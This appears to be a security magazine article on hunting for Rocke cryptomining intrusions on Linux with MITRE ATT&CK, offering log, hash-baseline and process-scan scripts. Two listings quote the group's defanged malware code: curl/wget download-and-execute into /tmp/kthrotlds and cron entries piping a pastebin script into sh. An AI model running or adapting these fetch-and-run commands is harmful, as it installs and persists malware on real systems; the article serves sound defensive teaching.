Working with the MITRE ATT&CK knowledge base
Detective Work
The MITRE ATT&CK website keeps information on attackers and intrusion techniques. We'll show you how to use that information to look for evidence of an attack.
Security has many facets and angles, and if you really want to be safe, you need to be aware of them all. One important skill is to become familiar with the logfiles on your system and the information they might reveal (see the box entitled "All About Logs"). But the attackers have become increasingly sophisticated in recent years, and to stay ahead of them, you need all the help you can get. Another important source of information is the MITRE ATT&CK website [1]. MITRE ATT&CK is a structured, globally available knowledge base describing tactics and attackers. In addition to tracking the various attack methods used in the wild, MITRE ATT&CK also provides clues that will help you look for evidence.
All About Logs
Linux systems store data in logfiles. Logs fall into four main categories: application, event, service, and system logs. Most logs are stored as plain text. Entries typically include important information such as the time, type, and severity level of the event, as well as the name of the process and the process ID (PID). There are exceptions, such as wtmp or lastlog, which use a binary format. Logfiles are generally kept in the /var/log directory, but not always: some programs save their logs in other places.
If systemd runs on your Linux system, many users reach for the journalctl command, which displays the messages of the systemd journal.
When diagnosing problems or errors, the first thing to do is check the logs. Searching through logs can be tedious and time consuming, which is why many users prefer simple Bash one-liners. Text processing commands like grep and awk are popular tools for searching out log information. They are especially useful for quick, one-line queries, and scripts built around them save time and make it easier to extract valuable data from logs.
An example of a simple one-liner is:
grep -E -r -o -h "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort | uniq > our-data.txt
The grep command uses a regular expression (the -E switch enables extended regex syntax) to search recursively through the current directory (switch -r) and prints only the matched parts, one per line (switch -o; the -h switch suppresses the filename prefix that a recursive search would otherwise add). The sort command sorts the data, and the uniq command removes duplicates. The result is then saved to the our-data.txt file.
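The same idea carried a step further, as an added example that is not part of the original article: a small POSIX shell script that extracts every IPv4 address from the logfiles under a directory, counts how often each one appears, and writes the list with the most frequent address first. The sample log lines are constructed for the demonstration and are not real log data.

```shell
#!/bin/sh
# Added example (not from the article): extract every IPv4 address from the
# logfiles under a directory, count how often each one appears, and save the
# result with the most frequent address first.

# extract_ips DIR OUTFILE -> writes "count address" lines to OUTFILE
extract_ips() {
    dir="$1"
    out="$2"
    # -E: extended regex, -r: recurse, -o: print only the match,
    # -h: omit the file-name prefix that -r would otherwise add
    grep -E -r -o -h '([0-9]{1,3}\.){3}[0-9]{1,3}' "$dir" \
        | sort | uniq -c | sort -rn \
        | awk '{ print $1, $2 }' > "$out"
}

# Demonstration on constructed sample log lines (not real log data).
demo() {
    tmp=$(mktemp -d)
    cat > "$tmp/auth.log" <<'EOF'
Mar 12 10:01:02 host sshd[1234]: Failed password for root from 203.0.113.7 port 51234 ssh2
Mar 12 10:01:05 host sshd[1234]: Failed password for root from 203.0.113.7 port 51240 ssh2
Mar 12 10:02:11 host sshd[1300]: Accepted publickey for alice from 198.51.100.4 port 40000 ssh2
EOF
    extract_ips "$tmp" "$tmp/our-data.txt"
    cat "$tmp/our-data.txt"
    rm -rf "$tmp"
}

demo
```

Point extract_ips at /var/log to run it against a real system; the counts make a single address that hammers the host stand out immediately, which a plain sorted list of unique addresses does not show.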
Searching for Evidence
It's best to learn from examples. One threat facing users today is attacks related to stealing system resources for the purposes of mining cryptocurrency. The techniques that hackers use are quite interesting and sometimes unconventional. The Rocke group is a good example. Rocke is a Chinese group of cyber criminals who specialize in malware attacks to gain access for crypto mining [2][3][4][5]. This group has been operating since 2018 and is dynamically developing its arsenal. The group evolves quickly and changes its techniques. Analysis of a Rocke group attack is not as easy as it might seem, but luckily, you can turn to the MITRE ATT&CK framework. Some of the techniques that MITRE ATT&CK associates with the Rocke group include:
- T1036.005 – Masquerading: Match Legitimate Name or Location
- T1053.003 – Scheduled Task/Job: Cron
- T1574.006 – Hijack Execution Flow: Dynamic Linker Hijacking
The following sections take a closer look at these techniques and what to do about them. Before delving into the details, remember that it is always a good idea to look for suspicious files.
Malware often creates files in the following directories:
/usr/local
/usr/sbin
/tmp
It is worth looking at these locations and checking for suspicious files. You might find file names similar to legitimate ones, and sometimes a file is generated automatically and takes a name consisting of a series of numbers. It is good to check the hash of these files. If the hash differs from what it is supposed to be, that is an indication that the file has been replaced or tampered with. You can use the VirusTotal platform [6] to check whether a hash matches a known file. The following command finds every executable file, computes its checksum (SHA-256), and saves the results to the list.txt file:
find / -type f -executable -exec sha256sum '{}' \; > list.txt
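A list of hashes is only useful if you have something to compare it with. The following added example (not code from the article) records a SHA-256 baseline of the executables in the directories named above and compares a later run against it, reporting files that are new, changed, or missing. The demonstration runs on constructed files in a temporary directory; paths are assumed to contain no whitespace.

```shell
#!/bin/sh
# Added example (not from the article): record SHA-256 hashes of the executables
# in the directories named above, then compare a later run against that baseline
# to find files that are new, changed, or missing. Assumes paths without whitespace.

# hash_executables DIR... -> "hash  path" lines, sorted by path
hash_executables() {
    find "$@" -type f -executable -exec sha256sum '{}' \; 2>/dev/null | sort -k2
}

# lookup_hash LISTFILE PATH -> prints the hash recorded for PATH (empty if absent)
lookup_hash() {
    awk -v p="$2" '$2 == p { print $1 }' "$1"
}

# compare_baseline BASELINE CURRENT -> prints one line per finding,
# returns 0 if nothing differs and 1 otherwise
compare_baseline() {
    baseline="$1"
    current="$2"
    findings=0
    while read -r hash path; do
        old=$(lookup_hash "$baseline" "$path")
        if [ -z "$old" ]; then
            echo "NEW      $path"; findings=$((findings + 1))
        elif [ "$old" != "$hash" ]; then
            echo "CHANGED  $path"; findings=$((findings + 1))
        fi
    done < "$current"
    while read -r hash path; do
        if [ -z "$(lookup_hash "$current" "$path")" ]; then
            echo "MISSING  $path"; findings=$((findings + 1))
        fi
    done < "$baseline"
    [ "$findings" -eq 0 ]
}

# Demonstration in a temporary directory with constructed files.
demo() {
    tmp=$(mktemp -d)
    mkdir "$tmp/bin"
    printf '#!/bin/sh\necho hello\n' > "$tmp/bin/hello"
    chmod +x "$tmp/bin/hello"
    hash_executables "$tmp/bin" > "$tmp/baseline.txt"
    printf '#!/bin/sh\necho tampered\n' > "$tmp/bin/hello"   # simulate a replaced binary
    hash_executables "$tmp/bin" > "$tmp/current.txt"
    compare_baseline "$tmp/baseline.txt" "$tmp/current.txt" || echo "differences found"
    rm -rf "$tmp"
}

demo
# Real use: hash_executables /usr/local /usr/sbin /tmp > baseline.txt
# and keep baseline.txt off the host, since an intruder with root can rewrite it.
```

Store the baseline somewhere the monitored host cannot modify it; a hash list that lives next to the files it describes can be updated by the same intruder who replaced them.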
T1036.005: Masquerading
Suppose the group downloads a payload using the curl or wget command. The configuration file and the malware binary are saved in the /tmp directory under the name kthrotlds. The malware is launched with the nohup command, which discards its output and lets the binary keep running in the background. This is a form of masquerading: the system will constantly show a running process called kthrotlds, a name chosen to look like a kernel thread, yet no genuine kernel thread is backed by a binary in the /tmp folder.
Listing 1 shows part of the malicious code.
Listing 1
Malicious Code
if [ ${ARCH}x = "x86_64x" ]; then
  (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060180x1822611359.jpg -o \
  /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060180x1822611359.jpg -O \
  /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
elif [ ${ARCH}x = "i686x" ]; then
  (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \
  /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \
  /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
else
  (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \
  /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \
  /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
fi
nohup /tmp/kthrotlds >/dev/null 2>&1 &
By default, Linux does not log information on open ports and connections. However, netstat comes to the rescue:
netstat -tupln
This command returns information on connections (port and IP address) to and from the system. You can review the established connections and then track down any that are undesirable.
Another way to check for a masked process is with the ps command:
ps auxf
This command displays a list of the processes running on the system. A malicious process often appears in square brackets, meaning that there is no command line for it and it is possibly posing as a kernel thread.
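The ps output tells you what a process calls itself; /proc tells you what actually backs it. The following added example (not code from the article) walks /proc and flags processes whose executable resolves to a staging directory such as /tmp, whose binary was deleted after launch, or which have no command line at all despite being backed by a real file. The directory list in suspicious_exe and the optional PROCROOT argument are assumptions for the demonstration.

```shell
#!/bin/sh
# Added example (not from the article): walk /proc and flag processes whose
# executable lives in a world-writable staging directory (such as /tmp), whose
# binary was deleted after launch, or which show an empty command line despite
# being backed by a real executable. Genuine kernel threads, the processes ps
# shows in square brackets, have no /proc/PID/exe link at all.

# suspicious_exe EXEPATH -> 0 if the resolved executable path looks suspicious
suspicious_exe() {
    case "$1" in
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
        *" (deleted)")                return 0 ;;
    esac
    return 1
}

# empty_cmdline PROCDIR -> 0 if the process has no command line at all
empty_cmdline() {
    [ ! -s "$1/cmdline" ]
}

# scan_processes [PROCROOT] -> prints "PID COMM EXE REASON" for each flagged process
# (PROCROOT defaults to /proc; a different root is only for testing)
scan_processes() {
    root="${1:-/proc}"
    for p in "$root"/[0-9]*; do
        [ -d "$p" ] || continue
        exe=$(readlink "$p/exe" 2>/dev/null) || continue   # no link: kernel thread
        comm=$(cat "$p/comm" 2>/dev/null || echo '?')
        pid=${p##*/}
        if suspicious_exe "$exe"; then
            echo "$pid $comm $exe executable-in-temp-or-deleted"
        elif empty_cmdline "$p"; then
            echo "$pid $comm $exe hidden-cmdline"
        fi
    done
    return 0
}

scan_processes
```

Run it as root: /proc/PID/exe of another user's process is unreadable otherwise, and such processes are silently skipped. A hit on a name like kthrotlds with an executable under /tmp is exactly the mismatch the masquerading technique relies on nobody checking.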
T1053.003 – Cron
Hackers use a variety of techniques to keep access to a system after it restarts. One of these methods is to add tasks to the cron tool. Cron lets you schedule tasks and run commands on that schedule without logging in to the system. Listing 2 shows a few crontab entries that could execute malicious code.
Listing 2
Crontab Entries
"*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh
##"

"*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh
##"
In this case, the attacker does two things:
- Adds a new crontab entry that points to a malicious script.
- Places the malicious script in a folder, which allows it to execute at the specific time defined in the crontab entry.
That is why it is always worth checking cron tasks to look for suspicious entries:
crontab -l
Malware can manipulate the cron utility in various ways, so it is also worth looking at the following locations:
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/cron.d/root
/etc/cron.hourly/oanacroner
/etc/cron.daily/oanacroner
/etc/cron.monthly/oanacroner
Or perform a search to find other cron-related files and directories on your system.